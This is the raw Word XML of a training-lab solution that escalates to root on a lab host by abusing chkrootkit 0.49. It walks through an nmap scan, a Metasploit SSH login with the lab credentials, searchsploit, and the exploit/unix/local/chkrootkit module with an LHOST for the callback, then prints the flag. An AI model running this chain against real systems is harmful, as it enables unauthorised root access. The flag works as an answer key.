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FEF2A" w14:textId="59FAFBCD" w:rsidR="00853ABF" w:rsidRDefault="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>Privilege Escalation - Rootkit Scanner</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297271AB" w14:textId="77777777" w:rsidR="00721B95" w:rsidRDefault="00721B95"/>
    <w:p w14:paraId="7F10832E" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378578EB" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>In this lab, the target server is running a vulnerable Rootkit Scanner. Your task is to exploit a known issue using the appropriate Metasploit module and escalate it to the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C96EE" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> Escalate to the root user on the target machine and retrieve the flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B6EDD8" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH Login Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF58F4" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">| Username | Password | | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>jackie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> | password |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F3D95E" w14:textId="77777777" w:rsidR="00721B95" w:rsidRDefault="00721B95"/>
    <w:p w14:paraId="5628B8B4" w14:textId="15619B50" w:rsidR="00721B95" w:rsidRDefault="00721B95">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBABB3C" w14:textId="77777777" w:rsidR="00721B95" w:rsidRDefault="00721B95"/>
    <w:p w14:paraId="1D5ECF55" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5944A8C0" w14:textId="761F305C" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E15E82" wp14:editId="150EDA39">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="588593282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A26B" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4505C673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099B12FB" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D33DB90" w14:textId="126518CB" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00D52427" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B74E36F" wp14:editId="412C08C4">
            <wp:extent cx="5727994" cy="2368672"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="17823825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2584" name="Picture 17823825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D583" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DF741" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E34B56" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">We can now perform a default Nmap port scan on the target to identify the open ports on the target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>system,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CDEA1A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679AA256" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3252B49B" w14:textId="13EDB5FE" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00D52427" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="216B868D" wp14:editId="0E16EBA5">
            <wp:extent cx="5740695" cy="2952902"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="564415243" name="Picture 2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15243" name="Picture 24" descr="A computer screen shot of a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5F59" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> We have discovered ssh server is running on the target machine. We will use the SSH login module and gain a remote shell on the Metasploit framework using the provided credentials i.e. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>jackie:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41A649" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9506E6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0D6E38A9" w14:textId="02E14974" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00D52427" w:rsidP="00721B95">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00721B95" w:rsidRPr="00721B95">
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58807606" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>Now, run the ssh login module to gain a remote shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57087D2D" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>use auxiliary/scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BB71C9B" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3AD170C7" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">set USERNAME </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>jackie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FE04F8C" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">set PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B586BC0" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A7FEF" w14:textId="3810AAEB" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00D52427" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7279DD19" wp14:editId="1071A62A">
            <wp:extent cx="5816899" cy="3251367"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="7919668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66816" name="Picture 7919668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25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F633" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> Interact with the shell session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743DE77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11BA5034" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A38D9E" w14:textId="1C574BA6" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00D52427" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BFDDA92" wp14:editId="08B35A5C">
            <wp:extent cx="5562886" cy="812842"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1120563511" name="Picture 26" descr="A computer screen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63511" name="Picture 26" descr="A computer screen with red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BF1E" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> Check the running services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC97C5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3E175169" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9AF1C1" w14:textId="6EEABCDE" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00F62C3A" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5C7AE6" wp14:editId="30F627B5">
            <wp:extent cx="5702593" cy="1651085"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="623706954" name="Picture 2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06954" name="Picture 27" descr="A screen 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2CF7" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>Observe,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> that there are a couple of processes running i.e. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> and one bash script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7ECDE2" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>Investigate the check-down bash script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD1BE2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5513A390" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>cat /bin/check-down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76ABD1" w14:textId="26035515" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="519ABA12" wp14:editId="04D978FE">
            <wp:extent cx="5943600" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1807836337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6F54" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> rootkit scanner </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>is running</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> as root every 60 seconds. Check the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> location and its version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DD3D7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4334AF5B" w14:textId="77777777" w:rsidR="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">command -v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3392918E" w14:textId="365C3C18" w:rsidR="00F62C3A" w:rsidRPr="00721B95" w:rsidRDefault="00F62C3A" w:rsidP="00721B95">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62C3A">
        <w:t>checks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F62C3A">
        <w:t xml:space="preserve"> whether </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F62C3A">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F62C3A">
        <w:t xml:space="preserve"> is available in your shell’s $PATH and prints how the shell would resolve that name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737FE23" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D7AE1" w14:textId="295670C9" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00F62C3A" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74319AB2" wp14:editId="4206FF5A">
            <wp:extent cx="3092609" cy="831893"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1587615885" name="Picture 2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5885" name="Picture 28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CE5F" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> We found the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> binary location and its version. Searching privilege escalation exploit module for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> 0.49.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9CFB0A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40577118" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> 0.49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A83FA" w14:textId="6B5A3C94" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00F62C3A" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD2F146" wp14:editId="3FB2CFAF">
            <wp:extent cx="5664491" cy="1600282"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="464936200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36200" name="Picture 2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FAFE" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> The current version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve"> is vulnerable to local privilege escalation. We will use the Metasploit module to gain root access and read the </w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> file which is located under the </w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/root</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3AAEC7" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> Do not kill the session, type CTRL+Z to send interactive session into background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4FCD39" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381081A" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6820CC26" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>set CHKROOTKIT /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721B95">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D44AD90" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC34C65" w14:textId="0773C92C" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="00F62C3A" w:rsidRPr="00F62C3A">
        <w:t>192.239.197.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556ABCA" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690929D7" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:t>cat /root/flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F97058F" w14:textId="2BAC8E4E" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00F62C3A" w:rsidP="00721B95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15DC1A55" wp14:editId="5C7394A9">
            <wp:extent cx="5747045" cy="4254719"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="116587486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74863" name="Picture 11658748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FA5D" w14:textId="77777777" w:rsidR="00721B95" w:rsidRPr="00721B95" w:rsidRDefault="00721B95" w:rsidP="00721B95">
      <w:r w:rsidRPr="00721B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00721B95">
        <w:t> 9db8bf8f483ff50857f26f9bd636bed6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96E758" w14:textId="77777777" w:rsidR="00721B95" w:rsidRDefault="00721B95"/>
    <w:sectPr w:rsidR="0072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61"/>
    <w:rsid w:val="00361E61"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
